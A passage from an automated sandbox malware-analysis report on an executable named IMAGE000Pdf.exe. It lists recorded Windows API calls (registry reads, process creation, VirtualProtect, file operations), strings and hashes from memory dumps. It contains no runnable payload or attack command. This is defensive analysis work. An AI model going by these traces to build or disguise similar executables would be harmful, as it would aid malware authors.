                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                      • String ID: C:\$C:\Users\user\AppData\Local\Temp\
                                      • API String ID: 3248276644-1964270705
                                      • Opcode ID: cded0a6966890639b687aa66a4455a295a884498cbe0599bea4925404aa51844
                                      • Instruction ID: 3e737dd218ce82e1fa1fef2ae0b63742eeb13cb079fe623d21add3619189c6ea
                                      • Opcode Fuzzy Hash: cded0a6966890639b687aa66a4455a295a884498cbe0599bea4925404aa51844
                                      • Instruction Fuzzy Hash: B2F0A435104E5115D632333A9D09BEF1558CE86718B19863BF8A2B22D2DB3C8A539DBE

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 909 4062bc-4062ee call 40625b 912 4062f0-40631e RegQueryValueExW RegCloseKey 909->912 913 40632c 909->913 912->913 915 406320-406324 912->915 914 406330-406332 913->914 915->914 916 406326-40632a 915->916 916->913 916->914
                                      APIs
                                      • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,007A0F28,00000000,?,?,Call,?,?,0040654B,80000002), ref: 00406302
                                      • RegCloseKey.KERNELBASE(?,?,0040654B,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,007A0F28), ref: 0040630D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: CloseQueryValue
                                      • String ID: Call
                                      • API String ID: 3356406503-1824292864
                                      • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                      • Instruction ID: 373679b9ec00f947e58de2b720fd419a4882b2706591ab80caa015ae1ce90e84
                                      • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                      • Instruction Fuzzy Hash: 56017C72510209EADF218F65CC09EDB3BA8FF54364F01803AFD5AA2190D778D964DBA4

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 917 4059d7-405a08 CreateProcessW 918 405a16-405a17 917->918 919 405a0a-405a13 CloseHandle 917->919 919->918
                                      APIs
                                      • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F50,Error launching installer), ref: 00405A00
                                      • CloseHandle.KERNEL32(?), ref: 00405A0D
                                      Strings
                                      • Error launching installer, xrefs: 004059EA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: CloseCreateHandleProcess
                                      • String ID: Error launching installer
                                      • API String ID: 3712363035-66219284
                                      • Opcode ID: c4e46f1f673fd3826d078202ae771a3f9877dbb6e8e98e36d3575ddcb335b3d8
                                      • Instruction ID: 2b341ff16c6abf5d503a25303b32c86a9a78efd9c2a610832e0bce27d8c53e5f
                                      • Opcode Fuzzy Hash: c4e46f1f673fd3826d078202ae771a3f9877dbb6e8e98e36d3575ddcb335b3d8
                                      • Instruction Fuzzy Hash: F3E0BFF46002097FEB109F64ED05F7B77ACEB44644F004525BD54F6150D7B999148A7D
                                      APIs
                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: 450ddb0a52dde23e6c3e7e65707e0a17b99b7c6dada291b67ac9213214883537
                                      • Instruction ID: 3e9f44f44444eb33be3e1f1d809517d1ef13f380758e007b8d3e22890c14ce30
                                      • Opcode Fuzzy Hash: 450ddb0a52dde23e6c3e7e65707e0a17b99b7c6dada291b67ac9213214883537
                                      • Instruction Fuzzy Hash: 0301F432624220ABE7195B389D05B2A3698E751318F10C13FF855F6AF1EA78CC02DB4D
                                      APIs
                                      • GetModuleHandleA.KERNEL32(?,00000020,?,00403514,0000000B), ref: 004067F5
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406810
                                        • Part of subcall function 00406773: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040678A
                                        • Part of subcall function 00406773: wsprintfW.USER32 ref: 004067C5
                                        • Part of subcall function 00406773: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067D9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                      • String ID:
                                      • API String ID: 2547128583-0
                                      • Opcode ID: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
                                      • Instruction ID: 99a4bc67a8c43757839ce5658996565e88f4cb2ecc15aeea03f34014f97f3c52
                                      • Opcode Fuzzy Hash: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
                                      • Instruction Fuzzy Hash: F2E0863350521056E611AA719D44C7773AC9F89650307843EF946F2080D738DC31ABBD
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\IMAGE000Pdf.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405EE8
                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F0A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: File$AttributesCreate
                                      • String ID:
                                      • API String ID: 415043291-0
                                      • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                      • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                      • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                      • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                      APIs
                                      • CreateDirectoryW.KERNELBASE(?,00000000,00403495,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 004059A8
                                      • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004059B6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: CreateDirectoryErrorLast
                                      • String ID:
                                      • API String ID: 1375471231-0
                                      • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                      • Instruction ID: 379133542b1e1e7011c0d69b4b2ae41cc98c6aec5a22f3063a42931ced3e53c7
                                      • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                      • Instruction Fuzzy Hash: 1EC04C71205502EEF6115B20DF48B1B7A909B50751F16843DA146E01E4DE389455D92D
                                      APIs
                                      • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403457,00000000,00000000,0040329E,?,00000004,00000000,00000000,00000000), ref: 00405F7B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                      • Instruction ID: e146fa180a083be72d256ad1b428d57881e9eb39a1326beaade4420b40277b6a
                                      • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                      • Instruction Fuzzy Hash: E7E0EC3221065BAFDF10AEA59C04EFB7B6CEB05360F004836FD55E6150D635E9219BA8
                                      APIs
                                      • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040340D,000000FF,00793700,?,00793700,?,?,00000004,00000000), ref: 00405FAA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                      • Instruction ID: df8aade711aef2fea4c6cc03ed90c08959c6261ddae8de931081f7d2433cde5f
                                      • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                      • Instruction Fuzzy Hash: 96E08C3221021AEBDF109E608C00AEB7B6CEB00360F004433FA24E3150D634E8218BA8
                                      APIs
                                      • VirtualProtect.KERNELBASE(6F93505C,00000004,00000040,6F93504C), ref: 6F9329FD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2482669839.000000006F931000.00000020.00000001.01000000.00000006.sdmp, Offset: 6F930000, based on PE: true
                                      • Associated: 00000000.00000002.2482628772.000000006F930000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.2482700059.000000006F934000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.2482741619.000000006F936000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6f930000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: 2b2a69cb7e793d1d876c91e766bb0165cfc3c901b86cf7058a4cf70f3e961790
                                      • Instruction ID: 444e60d4c783b9939b68eaa8009ca7a6097be39b70942f36a02c02dda66ad10d
                                      • Opcode Fuzzy Hash: 2b2a69cb7e793d1d876c91e766bb0165cfc3c901b86cf7058a4cf70f3e961790
                                      • Instruction Fuzzy Hash: A3F0ACF390CB82DEEB70CF2C85447063BE0B74E324B11492AE14CD6280E3364464CF91
                                      APIs
                                      • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,007A0F28,?,?,004062E9,007A0F28,00000000,?,?,Call,?), ref: 0040627F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: Open
                                      • String ID:
                                      • API String ID: 71445658-0
                                      • Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                      • Instruction ID: 981b209bfbc59ad728c3152e24748ded8346fc425447e23afb42b8d85bc6dac1
                                      • Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                      • Instruction Fuzzy Hash: 35D0123200020DBBDF11AF90ED05FAB372DAB08350F014426FE06A4091D775D530A728
                                      APIs
                                      • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                                      • Instruction ID: 2ab46fc48b107f7ec410a0490fc1e10939948660fe742cc14426a6f165494095
                                      • Opcode Fuzzy Hash: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                                      • Instruction Fuzzy Hash: 26C04C75784700BADA149B549E45F0677546B90701F158429B641A50D0CA78D410DA2C
                                      APIs
                                      • SetFilePointer.KERNELBASE(?,00000000,00000000,004031DA,?,?,00000007,00000009,0000000B), ref: 00403468
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
